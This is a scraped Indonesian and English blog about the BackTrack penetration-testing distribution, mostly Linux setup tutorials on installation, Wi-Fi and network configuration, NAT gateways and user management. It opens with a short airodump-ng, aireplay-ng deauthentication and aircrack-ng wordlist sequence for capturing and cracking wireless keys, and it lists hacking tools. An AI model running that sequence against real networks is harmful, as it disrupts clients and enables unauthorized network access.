airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
aireplay-ng --deauth 2 -c [client MAC] -a [Ap MAC] ath0
new console
aircrack-ng -w password.lst [hasil*cap]



Pergunakan dengan arif dan bijak

Read More......

Hacking tools: A new version of BackTrack helps ethical hackers

Monday, December 1, 2008 · 0 comments

Version 3.0 of BackTrack has been released. BackTrack is a Linux-based distribution dedicated to penetration testing or hacking (depending on how you look at it). It contains more than 300 of the world's most popular open source or freely distributable hacking tools.

I wrote about the first version of BackTrack back in 2006, although it was based off of Whax/Whoppix/Knoppix distributions, which started even earlier. Version 3.0, released on June 19, includes even more hacking tools (unfortunately, it still doesn't include Nessus due to vendor negotiations/restrictions), many fixes bugs, and improved menus.

Readers often ask me how they can quickly get up to speed on hacking or defending against hackers. My answer is always the same: Subscribe to multiple computer security distribution lists, read as much as you can, and learn how to (legally) hack. BackTrack is the quickest way to get access to hundreds of tools, if the Linux part doesn't scare you. For non-Linux users, this distribution is about as Windows-friendly as you can get. Most users can get up and running using BackTrack with little or no Linux knowledge. The KDE graphical user interface makes most tools and programs usable with a few mouse clicks. For instance, setting up Snort is a one-click process (try that outside of BackTrack).

BackTrack also does a decent job for wireless and password hacking. Although there's a long list of include tools, here are my personal favorites:

  • Metasploit (vulnerability tester)
  • Snort (intrusion detection/prevention)
  • Hping (packet shaper)
  • Nmap (fe gui included)
  • Xprobe2 (OS identifier)
  • Cisco Auditing Tool
  • Curl
  • Httprint (and GUI)
  • Lynx (bare-bones browser)
  • Nikto (awesome free Web site vulnerability scanner)
  • SQL Scanner
  • Milw0rm archive
  • Dsniff
  • Ettercap
  • Hydra (password guesser)
  • John the Ripper
  • Wireshark (packet sniffer/analyzer)
  • Kismet
  • Airsnort
  • Bluesnarfer
  • SIPCrack
  • OllyDBG

Not only does BackTrack have an excellent collection of tools, the designers of the CD have tried to align BackTrack with common penetration-testing guideline frameworks, including the Open Source Security Testing Methodology Manual and Information Systems Security Assessment Framework, which can only help any budding pen tester.

You can download several different types of images, including a 784MB USB/DVD image, a stripped-down 695MB ISO, and a 689MB VMware image.

Lest I get any angry readers taking me to task for "teaching malicious hacking," these tools are for the good guys. Bad hackers are already doing just fine without the supereasy toolkits. Overall, we need more defenders learning more, and tools like BackTrack help in that regard.

Read More......

Installasi Program di Backtrack [ Part I ]

Thursday, November 27, 2008 · 0 comments

Setelah menginstall distro Backtrack di linuxbox yang saya gunakan, rasanya kurang menarik bila tidak menambahkan beberapa tools yang membantu saya dalam kegiatan tulis-menulis :D seperti saat menulis artikel ini, saya menggunakan applikasi Bluefish versi 1.0.7. Selain applikasi untuk perkantoran, saya juga menanamkan beberapa applikasi seperti :

  • Openoffice 2.2.1
  • Abiword 2.4
  • The Gimp 2.2.17
  • Virtualbox 1.5.2
  • Cedega 5.1
  • Bluefish 1.0.7
  • Kaffeine 0.8.1
  • XMMS 1.2.10
  • Xine-ui 0.99.5

Applikasi tersebut sudah saya coba dan berjalan tanpa hambatan, untuk menambah applikasi pada Backtrack, kita hanya memerlukan konverter module yang sama dengan distro Slax, ya karena Backtrack berbasis Slax, maka Anda dapat menggunakan tools untuk merubah file berektensi *.tgz, *.mo, *.rpm ke *.lzm, disini saya menggunakan tools seperti mo2lzm, rpm2lzm, tgz2lzm dan lzm2dir yang semua’a dapat di peroleh dari situs Slax.

Apabila tools tersebut sudah tertanam di Backtrack Anda, maka command yang dapat Anda jalankan seperti berikut :

bt ~ # mkdir /root/slax_modules/applikasi/chkrootkit-0.46a-6
bt ~ # mo2lzm chkrootkit_0_46a-6.mo chkrootkit_0_46a-6.lzm
bt ~ # lzm2dir chkrootkit_0_46a-6.mo.lzm /root/slax_modules/applikasi/chkrootkit-0.46a-6

Selanjutnya Anda hanya tinggal meng-copy paste file yang sudah di ekstrak saja :D

Referensi:
http://slax.hosting4p.com
http://slax.hosting4p.com/modules.php

Read More......

Compiling and Installing The Latest Xorg 7.2

· 0 comments

If that’s not enough for you, this guide will take you through the steps of installing the latest Xorg 7.2 server. I needed to do this as well to get my new 965GM chipset working.
  1. Uninstall you’re old version of xorg (removepkg) packages are located in /var/log/packages
  2. Download the new packages. I got my packages from the pinki1 build. Don’t download the auto script it will not work for you, trust me.
  3. I downloaded them all to /var/log/packages then installed them (installpkg)
  4. Add:
  5. /usr/X11R7/lib to /etc/ld.so.conf

    Add /usr/X11R7/bin to the PATH variable
    Note: you can also edit /etc/profile and find the lan that says:

    PATH="/usr/local/bin:/usr/bin:/bin:/usr/X11R6/bin:/usr/local/apache/bin:/usr$

    And change X11R6 to X11R7

  6. Now is the time to install any graphic drivers if you happen to be using the lintel drivers you can find the install directions from: http://intellinuxgraphics.org/install.html and the actual drivers from xorg.freedesktop.org
  7. Change all the fontpaths in /etc/X11/xorg.conf from
  8. /X11R6 to /X11R7
  9. Change your fontpaths in /etc/fonts/fonts.conf:
  10. /usr/X11R6/lib/X11/fonts/TTF

    might be changed to

    /usr/X11R7/lib/X11/fonts/TTF
  11. Install these packages:
  12. ftp://ftp.scarlet.be/pub/linuxpackages/Slackware-11.0/Library/libpthread-stubs/libpthread-stubs-0.1-i486-1ced.tgz
    ftp://ftp.scarlet.be/pub/linuxpackages/Slackware-11.0/X11/libxcb/libxcb-1.0-i486-1ced.tgz
    ftp://ftp.scarlet.be/pub/linuxpackages/Slackware-11.0/X11/xcb-proto/xcb-proto

    Note: Change xcb-proto to xcb-proto.tgz so you can install it:

    # mv xcb-proto xcb-proto.tgz
  13. Run /usr/X11R6/bin/fc-cache -f from root and user if you have another account.
  14. Congratulations you’re now running xorg 7.2

Author :
remote-exploits.blogspot.com

Ditulis dalam Modding. 1 Komentar »

Compiling ALSA

“ALSA (an acronym for Advanced Linux Sound Architecture) is a Linux kernel module that replaces several different kernel drivers for sound cards with a single device driver which handles the diversity of sound cards internally. Some of the goals of the ALSA project were to support automatic configuration of sound card hardware, and graceful handling of multiple sound devices in a system, goals which it has largely met.

  1. Unpack the source:
  2. # bunzip2 alsa-driver* && tar -xvf alsa-driver*
  3. Change to the new directory:
  4. # cd alsa*
  5. Configure and compilation alsa:
  6. # ./configure && make
  7. Begin install:
  8. # make install
  9. If your card is supported(http://www.alsa-project.org/alsa-doc/), run ‘alsaconf’ and follow the directions:
  10. # alsaconf
  11. Then, to configure sound and mixer options:
  12. # alsamixer

Author :
remote-exploits.blogspot.com

Read More......

Koneksi ke OPEN/WEP WLAN ( DHCP )

· 0 comments

Untuk menghubungkan ke wireless LAN yang Open atau Secured by WEP (DHCP).

# iwconfig [interface]  mode managed key [WEP key]

Note :

Gantilah kata “interface” dengan nama interface Anda yang lagi aktif saat ini, misal ath0, wlan0 atau eth1.
WEP key, masukkanlah kata kuci WEP, 10 karakter hexadecimal untuk 64 bit dan 26 karakter untuk 128 bit.

# iwconfig essid  "[ESSID]" 

ESSIS = Spesifikasi SSID dari suatu WLAN

# dhclient [interface] 

Untuk mendapatkan IP address, netmask, DNS server dan default gateway dari akses poin.

Read More......

Koneksi ke OPEN/WEP WLAN ( Setup IP Manual )

· 0 comments

Untuk menghubungkan ke wireless LAN yang Open atau Secured by WEP ( IP Manual/Statis ).

# iwconfig [interface]  mode managed key [WEP key]
# ifconfig [interface] [IP address] netmask [subnetmask]
# iwconfig essid "[ESSID]"
# route add default gw [IP of default gateway]

Note :

Masukkan IP Address gatewaynya ( biasanya alamat IP dari Access Point )

# echo nameserver [IP address of DNS server]  >> /etc/resolv.conf

Konfigurasikan DNS server Anda.

# ping www.detik.com

Melakukan uji koneksi.

Read More......

Kumpulan Perintah iwconfig

· 0 comments

# iwconfig [interface] mode master

Menjadikan kartu PCMCIA dalam mode akses poin

# iwconfig [interface] mode managed

Menjadikan kartu PCMCIA Anda dalam mode client pada jaringan wifi infrastruktur

# iwconfig [interface] mode  ad-hoc

Mengeset kartu Anda sebagai anggota di jaringan wifi ad hoc tanpa akses poin

# iwconfig  [interface] mode monitor

Mengeset kartu Anda dalam mode monitor

# iwconfig [interface]  essid “SSID_Anda”

Konfigurasikan ESSID jaringan Anda.

# iwconfig [interface] key 1111-1111-1111-1111

Mengeset kunci WEP 128bit

# iwconfig [interface] key 11111111

Mengeset kunci WEP 65 bit

# iwconfig [interface] key off

Menonaktifkan kunci WEP

# iwconfig  [interface] key open

Menset sebagai open mode, tidak diperlukan autentikasi

# iwconfig [interface] channel [channel no.]

Menset sebuah channel 1-14

# iwconfig  [interface] channel auto

Memilih channel otomatis

# iwconfig  [interface] freq 2.422G

Menset channel dalam Ghz

# iwconfig [interface]  ap 11:11:11:11:11:11

Memaksa kartu untuk mendaftar ke alamat AP

# iwconfig [interface] rate 11M

Kartu akan menggunakan kecepatan tertentu

# iwconfig [interface] rate auto

Memilih kecepatan otomatis

# iwconfig [interface] rate auto 5.5M

Kartu akan menggunakan kecepatan tertentu dan kecepatan di bawahnya jika memang diperlukan

Read More......

Gateway Backtrack2

· 0 comments

Langsung saja, tutorial ini untuk melengkapi postingan bang alie dengan judul “Router Backtrack”-nya. Untuk membuat Gateway menggunakan distro Linux Backtrack langkah pertama adalah tentunya sudah terinstall Backtrack di komputer yang akan dijadikan sebagai Gateway, disini saya menggunakan Backtrack2 sebagai tempat percobaannya…eth0 terhubung langsung ke internet dengan keterangan sbb :

IP Address : 203.81.xxx.xx5
Netmask : 255.255.255.0
Gateway : 203.81.xxx.xx1
Nameserver :
203.81.xx4.11
203.81.xx5.12

eth1 terhubung ke klien di jaringan, dengan keterangan sbb :

IP Address : 192.168.0.1
Netmask : 255.255.255.0

Setelah sempat bingung mengutak-atik agar settingan jaringan dapat berjalan d saat startup mulai dari gui, mengetikkan command netconfig di konsole, bahkan file /etc/rc.d/rc.inet1.conf pun sudah saya utak-atik, tetap saja hasilnya nihil ( lantaran masih newbie se… )) ), untuk mengaktifkan NAT (Network Address Translation) biasanya ( di slackware ) kita mengisi beberapa baris perintah iptable di /etc/rc.d/rc.local, namun disini saya tidak melakukannya, sebagai alternatif… maka saya mencoba mengganti isi file /etc/rc.d/rc.inet1 yang akan diisi dengan beberapa baris perintah untuk setting network sekaligus iptablenya ( tentunya perintah iptable sederhana ), berikut langkah yang saya lakukan :

# chmod +x /etc/rc.d/rc.ip_forward
# echo “1″>/proc/sys/net/ipv4/ip_forward

Perintah tsb untuk mengaktifkan opsi bahwa Linuxbox tsb akan difungsikan sebagai router.

Masukkan NameServer pada file /etc/resolv.conf

# echo “nameserver 203.81.xx4.11″>/etc/resolv.conf
# echo “nameserver 203.81.xx5.12″>>/etc/resolv.conf
# cat /etc/resolv.conf
nameserver 203.81.xx4.11
nameserver 203.81.xx5.12

Sebelumnya saya melakukan backup file defaultnya terlebih dahulu…

# mv /etc/rc.d/rc.inet1 /etc/rc.d/rc.inet1.old
# nano /etc/rc.d/rc.inet1

Isinya sebagai berikut ( sesuaikan dengan keterangan diatas ) :

# rc.inet1 This shell script boots up the base INET system.
#
# Version: @(#)/etc/rc.d/rc.inet1 1.01 05/27/93
# Modified by atoz [at] debian-id [dot] org

# Attach the loopback device.
/sbin/ifconfig lo 127.0.0.1
/sbin/route add -net 127.0.0.0 netmask 255.0.0.0 lo

# Auto eth0.
IPADDR[0]=”” # REPLACE with YOUR IP address!
NETMASK[0]=”” # REPLACE with YOUR netmask!
NETWORK[0]=”” # REPLACE with YOUR network address!
BROADCAST[0]=”” # REPLACE with YOUR broadcast address, if you
# have one. If not, leave blank and edit below.

GATEWAY=”” # REPLACE with YOUR gateway address!

# Uncomment the line below to initialize the ethernet device.
/sbin/ifconfig eth0 ${IPADDR[0]} broadcast ${BROADCAST[0]} netmask ${NETMASK[0]}

# Uncomment this to set up your gateway route:
/sbin/route add default gw ${GATEWAY} netmask 0.0.0.0 metric 1

# Auto eth1.
IPADDR[1]=”” # REPLACE with YOUR IP address!
NETMASK[1]=”” # REPLACE with YOUR netmask!
NETWORK[1]=”” # REPLACE with YOUR network address!
BROADCAST[1]=”” # REPLACE with YOUR broadcast address, if you
# have one. If not, leave blank and edit below.

# Uncomment the line below to initialize the ethernet device.
/sbin/ifconfig eth1 ${IPADDR[1]} broadcast ${BROADCAST[1]} netmask ${NETMASK[1]}

# Network Address Translation ( NAT ).
iptables -A FORWARD -o eth0 -i ! eth1 -j ACCEPT
iptables -A FORWARD -m state –state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -f -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# End of rc.inet1

Anda dapat mencoba melakukan shutdown Linuxbox yang Anda gunakan dan menikmati hasilnya )

Read More......

Manajemen User di Backtrack

· 0 comments

Backtrack merupakan turunan dari distro Slax, dan bisa di katakan sebagai cucunya dari distro Slackware, bagi yang sudah pernah atau familiar dengan distro tua ini ( Slackware.Red ), tentunya tidak perlu terlalu lama untuk melakukan pembuatan user, jadi tutorial ini di tujukan untuk para newbie linux seperti saya p
Tutorial ini juga saya publish di blog BacktrackIndo.

Misalnya kita membuat user baru bernama anonymous. berikut langkah-langkahnya :

Periksa terlebih dahulu Anda sekarang login sebagai apa? tentu saja sebagai root ))
lha… user lainkan belum dibikin ne… ( AtoZ edan !!!… )) )

# whoami
root


Sebelum melanjutkan ke tahap pembuatan user, saya akan membuat folder public_html terlebih dulu
di direktori /etc/skel agar setelah selesai membuat user, secara automatis folder public_html
juga akan dibuat pada home direktori user tersebut ( /home/anonymous/public_html ) :

# mkdir /etc/skel/public_html

Sekarang kita memasuki tahap pembuatan user :

# adduser anonymous

Login name for new user: anonymous

User ID (’UID’) [ defaults to next available ]:

Initial group [ users ]:

Additional groups (comma separated) []:

Home directory [ /home/anonymous ]

Shell [ /bin/bash ]

Expiry date (YYYY-MM-DD) []:

New account will be created as follows:

—————————————
Login name…….: anonymous
UID…………..: [ Next available ]
Initial group….: users
Additional groups: [ None ]
Home directory…: /home/anonymous
Shell…………: /bin/bash
Expiry date……: [ Never ]

This is it… if you want to bail out, hit Control-C. Otherwise, press
ENTER to go ahead and make the account.

Creating new account…

Changing the user information for anonymous
Enter the new value, or press ENTER for the default
Full Name []: anonymous
Room Number []:
Work Phone []:
Home Phone []:
Other []: atoz@bungker.org
Changing password for anonymous
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password: ***********
Re-enter new password: ***********
Password changed.

Account setup complete.

Note :
Masukkan nama user, no id useeer, nama kecil atau inisialisasi, home direktori, shell yang digunakan,
tanggal kadaluarssa hasil account yang dibuat.

Untuk menghapus user, jalankan perntah :

# userdel anonymous

Setiap user memilik group masing-masing, berguna bila bekerja dalam sebuah jaringan. Semua user yang berada dalam group yang sama memiliki hak akses yang sama pula, nah… untuk menambah group. gunakan perintah :

# groupadd [nama_group]

Untuk menghapusnya, gunakan perintah :

# groupdel [nama_group]

Apabila Anda ingin memodifikasi akun user yang Anda punya, gunakan perntah usermod. Misalnya Anda ingin memodifikasi
group user anonymous, menjadi group wheel.

# usermod -G wheel anonymous
# id anonymous
uid=1001(anonymous) gid=100(users) groups=100(users),10(wheel)

Untuk melihat manual penggunaan perintah yang telash disebutkan di atas, gunakan perintah man [nama_perintah]. Contoh :

# man usermod

Sampai disini dulu pembahasan kita. Selamat mencoba )

Read More......

BackTrack

· 0 comments

ALL ABOUT BACK|TRACK
remote-exploit
wiki backtrack
forum remote-exploit
offensive security
INDONESIAN BACKTRACK
backtrack newbie
indonesian backtrack community
collecting about backtrack pentest
yogyafree backtrack
yogyafree backtrack
bungker.org

dadang haryadi backtrack
http://download.cyber-isp.net/linux/Backtrack/ download BT1
http://yum.jardiknas.org/backtrack/ download BT2
http://ftp.fisika.ui.ac.id/pub/linux/iso-cd/backtrack/ download BT2
http://repo.ugm.ac.id/iso/backtrack/ download BT2&3
echo backtrack
ALL ABOUT SLACKWARE

Bagaimana Menggunakan Linux Backtrack

Ok,banyak yang bertanya2 cara menggunakan linux backtrack.
Disini saya akan mengulas "sedikit" tentang cara menggunakan linux backtrack.
Download dulu linuxnya yang berbentuk livecd download backtrack2
Lalu burn menjadi livecd "caranya"
Booting komputer via cd (jgn lupa setting dibios boot first cd)
=============================================================

-------------------------------------------------------
:: Backtrack 2.0 ::
BackTrack
login: root
password: toor
--------------------------------------------------------
*** When finished, hit Ctrl+Alt+Delete and
wait until the computer reboots ***
--------------------------------------------------------
slax login:_
=============================================================
Lalu login masukkan login:root dan password:toor
Setelah itu Ketikkan xconf
=============================================================
Trying to autoconfigure Xwindow system, please wait...
creating /etc/X11/xorg.conf...
all done. Run startx now.
=============================================================
Atau langsung ketik startx
atau lo bisa ketik guifast
ok sekarang lo dah masuk ke linux backtracknya.


Biasanya backtrack akan men set network secara dhcp tapi kalau ngga caranya gini:
setting IP secara Dhcp.
caranya:
ketik "dhcpd eth0"
(untuk eth0 ini tergantung dari lan card yang lo gunain)
untuk memastikan ketik ifconfig


setting IP secara static.
caranya:
ketik "ifconfig eth0 192.168.1.2/24" ->setting IP dan subnet
ketik "route add default gw 192.168.1.1" -> setting gateway
ketik "echo nameserver 192.168.1.1 > /etc/resolve.conf" -> sett dns
untuk memastikan ketik ifconfig


Jangan lupa untuk ganti passwordnya
caranya:
ketik "passwd" masukkan pasword yang "kuat"


untuk memunculkan bash command bisa ketikkan:
leetmode atau yakuake


cara menginstal backtrack ke harddisk beserta pilihan dual boot:
jalanin "Qtparted" dari linux tsb dari bash command
nanti didalem qtparted tsb terdapat partisi (kayak fdisk di win)
ex: 4Giga
partisi pertama 3.5Giga
partisi Kedua 0.5Giga
yang partisi pertama di format ext3
yang partisi kedua di format linux-swap
(disini qtparted suka ngaco lo buka shell umount ato mount hda1 dan hda2)
hal ini supaya qtparted bisa di create ato format setelah itu jangan lupa commit di toolbarnya
setelah itu buka "backtrack installer" pilih "install backtrack to hda2" hal ini tergantung hdd lo
klo sata biasanya namanya sda klo ide biasanya namanya hda (hda1 buat windows and hda2 buat linux ext3) tunggu sampai 100% setelah itu restart and boot ke linux automatically
dari linux lo buka shell masuk ke folder /etc ketik "nano lilo.conf" trus di lilo tsb tambah ini diatas image
==============================
other = /dev/hda1
label = Windows
table = /dev/hda
==============================
jadi nya klo gw kayak gini
==============================
boot = /dev/hda
prompt
timeout =1200
bitmap=/boot/splash.bmp
change-rules
reset
vga = 0x317
other = /dev/hda1
label = Windows_Xp
table = /dev/hda
image = /boot/vmlinuz
root = current
initrd = /boot/splash.initrd
label = Backtrack_2
read-only
========================
dah sekarang restart lo bisa liat di waktu pertama boot di minta milih mau w1nd0ws apa linux


Sekarang merubah tampilan pertama backtrack :
caranya:
ketik ini di shell alias command promptnya klo di wnd0ws
bt ~ # nano /etc/issue
dah deh tinggal kreasiin sendiri


ngerubah command line logon menjadi otomatis saat kde start:
bt ~ #nano/etc/inittab
rubah id:3:initdefault: menjadi id:4:initdefault:


membuat leetmode start otomatis
ketik:
cd /root/.kde/Autostart
ln -s /usr/bin/leetmode leetmode
hal ini membuat link leetmode di outostart


membuat yakuake start otomatis
ketik:
cd /root/.kde/Autostart
ln -s /opt/kde/bin/yakuake yakuake
sekarang di KDE hanya tinggal tekan F12


Script dibawah yang membuat otomatis cd-rom keluar:
ketik:
cd /etc/rc.d
ketik:
nano rc.6
cari code yang seperti ini:
# eject cdrom devices
. ./usr/lib/liblinuxlive
#echo "Ejecting all CDROMs..."
#list_cdrom_devices while read DEVICE; do
# cdrecord dev=$DEVICE -eject >/dev/null 2>/dev/null
# can't use eject because it's not working with our kernel
# eject -s $DEVICE >/dev/null 2>/dev/null
#done
#echo "========================================"
#echo "It's safe to switch the computer off now"
#echo -ne "Press Enter to $command "
#read junk


cara merubah pesan pertama kali boot:
nano /etc/issue


cara menginstal java client:
INSTALL JAVA CLIENT
http://java.com/en/download/manual.jsp
- Download Java Linux (self-extracting file)
- cd opt
- mkdir java
- cp /tmp/jre-6u1-linux-i586.bin /opt/java
- cd java
- ls
- chmod a+x jre-6u1-linux-i586.bin
- ls -l
- ./jre-6u1-linux-i586.bin
- yes
- ls
http://java.com/en/download/help/5000010500.xml#enable
- cd /opt/firefox/plugins
- ln -s /opt/java/jre1.6.0_01/plugin/i386/ns7/libjavaplugin_oji.so
- Firefox-Preferences-Content-Enable java
Good luck.


secure shell daemon
caranya:
ketik "sshd-generate"
ketik "/usr/sbin/sshd"
ketik "netstat -ant grep 22"


Bikin http server klo bahasa neubenya bikin web server
caranya:
ketik "apachectl start" ->fungsinya hidupin apache server buat web
ketik "netstat -ant grep 80" ->cek apakah port 80 aktif
ketik "apachectl stop" ->fungsinya matiin apache server
ketik "netstat -ant grep 80" ->cek lagi


bikin file tansfer protocol atau kerennya ftp server
caranya:
ketik "atftpd --daemon --port 69 /tmp/"
ketik "netstat -anu grep 69"


bikin vnc server biasanya dipake buat ngeremote
caranya:
ketik "vncserver"
masukkan 8digit pass ato lebih
ketik "netstat -ant grep 5901"

caranya bikin dual boot secara otomatis (dikonfigurasi sendiri sama linuxnya)
tinggal ketik "liloconfig" tinggal ikutin perintahnya aja

konfigurasi IP memakai netconfig
di shell tinggal ketik "netconfig" aja

buat tanem ip
masuk k etc ubah file rc.inet1 "nano /etc/rc.d/rc.inet1.conf"
rubah:
# Config information for eth0:
IPADDR[0]="xxx.xxx.xxx.xxx"
NETMASK[0]="255.255.255.xxx"
USE_DHCP[0]=""
DHCP_HOSTNAME[0]=""
# Default gateway IP address:
GATEWAY="xxx.xxx.xxx.xx"
jangan lupa ketik
bt rc.d # rc.inet1

bikin techmon kayak leetmode di BT3
caranya di sheel ketik "superkaramba" trus download filenya jadi degh di desktop

cara install paket yang berextention .tgz
tinggal ketik:
"installpkg namapaket.tgz"

mengextrax file .gz
"tar -xzvf namafile.gz"
$ tar -zxvf nama_file.tar.gz -C /folder/tujuan/

mengextrax file .bz2
"tar -xjvf namafile.bz2"

bagaimana mengupdate slackware yang ada di backtrack pake slapt-get:
ketik ini di shell "slapt-get --update" setelah itu ketik "slapt-get --upgrade"
ketik 'kwrite /etc/slapt-get/slapt-getrc"
tambahin:
SOURCE=http://darkstar.ist.utl.pt/slackware/
buat download updatean nya
program yang lain yaitu:
Kslackcheck buat update slack juga
ini downloadnya kslackcheck
cara installnya tinggal "installpkg namafile.tgz" selesai lihat di system
nambah fast-track di BT2
caranya download dulu fast-track nya
lalu masukkan ke directory "/pentest/misc/"
setelah itu ketik "chmod 755 fast-track.py"

konfigurasi sound dibacktrack
tinggal ketik "alsaconf" ikutin perintahnya setelah selesai ketik "alsamixer" setelah setting suara ketik "alsactl store" buat nyimpen

ini hal aneh kok pentest ada officenya
yahhh gpp degh namanya juga belajar
pertama download officenya di open office
ekstrax "tar -xzvf OOo_2.3.1_LinuxIntel_install_en-US.tar.gz"
masuk ke folder "cd OOG680_m9_native_packed-1_en-US.9238"
masuk ke folder "cd RPMS"
ketik ini "rpm2tgz *.rpm"
install "installpkg *.tgz"
masuk ke diretory "cd /opt/openoffice.org2.3/program/"
jalanin program "soffice"
bikin di menu kde
bikin di menu start kde
klik kde start klk kanan pilih "edit menu"
pilih editor trus klik kanan pilih new item
name : office
command : '/opt/openoffice.org2.3/program/soffice' #pake tanda ' nya yah
work path : /opt/openoffice.org2.3/program
finish
gretzz to irfahmi
finish

mau milih window manager ketik ini "xwmconfig"


cara buat ngebaca ntfs yaitu pake ntfs-3g
sebelumnya umount dulu partisi yang mau di ntfs
"umount /dev/hda"
"ntfs-3g /dev/hda /mnt/hda? -o force"

cara nginstall Xvidcap buat bikin video tutorial
donwload
trus "installpkg namafile"

install kmail client
download kmailnya
"tar -xjvf kdepim-3.5.6.tar.bz2"
"configure && make && make install"

install thunderbird
download thunderbirdnya
ekstrax "tar -zxvf thunderbird-2.0.0.12.tar.gz"
buat linknya di kde menu editor linknya Thunderbird
atau "double klik thunderbird"

temen g ada yang nanya cara ngerubah password gimana
ketik aja "passwd" ketik password yang panjang
supaya ngga di konfirmasi sama linux lo

mengaktifkan ssh pada backtrack pertama kali
"setup-sshd" untuk start atau memulainya "start-sshd"
untuk stop "stop-sshd"

untuk mengaktifkan firewall di backtrack secara otomatis
bt / # cat >> /etc/rc.d/rc.local
. /etc/rc.d/rc.FireWall start
^d
bt / #
gretzz willy master slackware


Apasih kernel itu (bisa lihat disini)
Apasih perbedaan kernel SMP sama kernel biasa (bisa lihat disini)

=========================================
Install BT3 ke hdd
=========================================
Gw ngga Jelasin bagaimana caranya
membuat partisi di hdd
Siapin partisi hdd contoh:
sda1=backtrack
sda2=swap
——————————
bt~#mkdir /mnt/backtrack
bt~#mount /dev/sda3 /mnt/backtrack/
bt~#mkdir /mnt/backtrack/boot/
bt~#mount /dev/sda1 /mnt/backtrack/boot/
bt~#cp –preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/
bt~#mkdir /mnt/backtrack/{mnt,proc,sys,tmp}
bt~#mount –bind /dev/ /mnt/backtrack/dev/
bt~#mount -t proc proc /mnt/backtrack/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack/boot/
—————————–
buat lilonya.
bt~#chroot /mnt/backtrack/ /bin/bash
bt~#nano /etc/lilo.conf
—————————–
# Isi dari Lilo.conf
lba32
boot = /dev/sda
prompt
timeout=60
change-rules
reset
vga=791 #tergantung display lo liat aja yang sudah ada
image = /boot/vmlinuz
root = /dev/sda3
label = Backtrack3_final
#selesai
bt~#lilo -v
bt/~#exit
—————————-
trus reboot komputernya :)


semuanya diketik tanpa memakai " "

Read More......

 Subscribe in a reader

Review Update Via Email:

Delivered by FeedBurner

Add to Google Reader or Homepage

Powered by FeedBurner

Archive

FEEDJIT Live Traffic Feed